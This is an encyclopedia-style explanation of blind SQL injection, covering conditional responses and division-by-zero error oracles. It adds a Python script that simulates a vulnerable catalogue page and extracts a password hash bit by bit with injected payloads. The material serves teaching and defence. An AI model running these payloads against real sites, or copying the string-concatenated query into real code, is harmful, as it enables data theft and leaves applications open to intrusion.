Blind SQL injection is used when a web application is vulnerable to SQL injection but the results of the injection are not visible to the attacker. The vulnerable page may not display any data at all, but it renders differently depending on the outcome of a logical statement injected into the legitimate SQL statement issued for that page. Each request therefore yields only one bit of information, so this type of attack can become time-intensive: a new statement must be crafted for each bit recovered. Several tools can automate these attacks once the location of the vulnerability and the target information have been established.[11]
Conditional responses
One type of blind SQL injection forces the database to evaluate a logical statement on an ordinary application screen.
SELECT booktitle FROM booklist WHERE bookId = 'OOk14cd' AND '1'='1';
will result in a normal page while
SELECT booktitle FROM booklist WHERE bookId = 'OOk14cd' AND '1'='2';
will likely give a different result if the page is vulnerable to SQL injection. (The injected inputs here are OOk14cd' AND '1'='1 and OOk14cd' AND '1'='2; the application itself supplies the closing quote.) A difference like this suggests to the attacker that blind SQL injection is possible, leaving the attacker to devise statements that evaluate to true or false depending on the contents of another column or table outside the SELECT statement's column list.[12]
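As an added end-to-end example (not code from the original page), the following Python script simulates the vulnerable catalogue page with an in-memory SQLite database and drives it as a yes/no oracle: first the '1'='1' / '1'='2' probe from the text, then bit-by-bit recovery of a value from a table outside the SELECT's column list, counting the requests to show why this is time-intensive without tooling. The booklist table and the bookId value follow the page; the users table, the hypothetical vulnerable_page function and all sample data are constructed for this example.

```python
import sqlite3


def build_db():
    """Constructed sample data (not from the page): the catalogue the page
    queries plus a users table holding a value the attacker cannot see."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE booklist (bookId TEXT PRIMARY KEY, booktitle TEXT);
        INSERT INTO booklist VALUES ('OOk14cd', 'Sample Title');
        CREATE TABLE users (username TEXT, password_hash TEXT);
        INSERT INTO users VALUES ('admin', 'e10adc3949ba59abbe56e057f20f883e');
    """)
    return db


def vulnerable_page(db, book_id):
    """Stand-in for the vulnerable endpoint (hypothetical application code).
    The user-supplied id is concatenated into the query, which is the bug;
    the response never contains data from `users`, only found / not found."""
    query = f"SELECT booktitle FROM booklist WHERE bookId = '{book_id}'"
    try:
        row = db.execute(query).fetchone()
    except sqlite3.Error:
        return "Error"
    return "Book found" if row else "No such book"


class BlindClient:
    """Attacker side: drives the page as a yes/no oracle and counts requests."""

    def __init__(self, db):
        self.db = db
        self.requests = 0

    def ask(self, condition):
        # Injected input; the application supplies the closing quote, so the
        # payload ends with AND '1'='1 to keep the statement syntactically valid.
        payload = f"OOk14cd' AND ({condition}) AND '1'='1"
        self.requests += 1
        return vulnerable_page(self.db, payload) == "Book found"

    def detect(self):
        """Step 1: do a tautology and a contradiction render differently?"""
        return self.ask("'1'='1'") and not self.ask("'1'='2'")

    def extract(self, expr, max_len=64):
        """Step 2: recover the string value of `expr` (a scalar subquery against
        a table outside the SELECT's column list), one bit per request.
        unicode()/substr() are SQLite's equivalents of ASCII()/SUBSTRING()."""
        result = ""
        for pos in range(1, max_len + 1):
            if not self.ask(f"length(({expr})) >= {pos}"):
                break  # no character at this position: value fully recovered
            code = 0
            for bit in range(6, -1, -1):  # 7 bits cover printable ASCII
                if self.ask(f"(unicode(substr(({expr}), {pos}, 1)) >> {bit}) & 1 = 1"):
                    code |= 1 << bit
            result += chr(code)
        return result


def division_by_zero_raises(db):
    """Caveat for the 1/0 conditional-error variant: SQLite, like MySQL's
    default mode, evaluates 1/0 to NULL instead of raising, so that oracle is
    silent here and this returns False; SQL Server, Oracle and PostgreSQL raise."""
    page = vulnerable_page(
        db, "OOk14cd' AND (SELECT 1/0 FROM users WHERE username='admin') AND '1'='1")
    return page == "Error"


if __name__ == "__main__":
    db = build_db()
    client = BlindClient(db)
    print("blind injection possible:", client.detect())
    secret = client.extract("SELECT password_hash FROM users WHERE username='admin'")
    print(f"recovered {secret!r} in {client.requests} requests")
    print("1/0 raises on this DBMS:", division_by_zero_raises(db))
```

Recovering the 32-character value costs 257 requests (one length check per position plus seven bit checks, and a final length check that fails), which is the cost the text refers to and what tools such as sqlmap automate. On MySQL or SQL Server the same logic uses ASCII() and SUBSTRING() in place of unicode() and substr(); the last function shows that the division-by-zero error oracle is DBMS-dependent and must be swapped for another error-raising expression on engines that return NULL for 1/0.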
A related technique provokes a conditional error instead of a different page:
SELECT 1/0 FROM users WHERE username='ooo';
raises a division-by-zero error only if a row for user ooo exists, because the select-list expression is evaluated only for rows that satisfy the WHERE clause. This relies on the DBMS treating division by zero as an error (Microsoft SQL Server, Oracle and PostgreSQL do); MySQL and SQLite return NULL for 1/0 in a SELECT by default, so a different error-raising expression is needed there.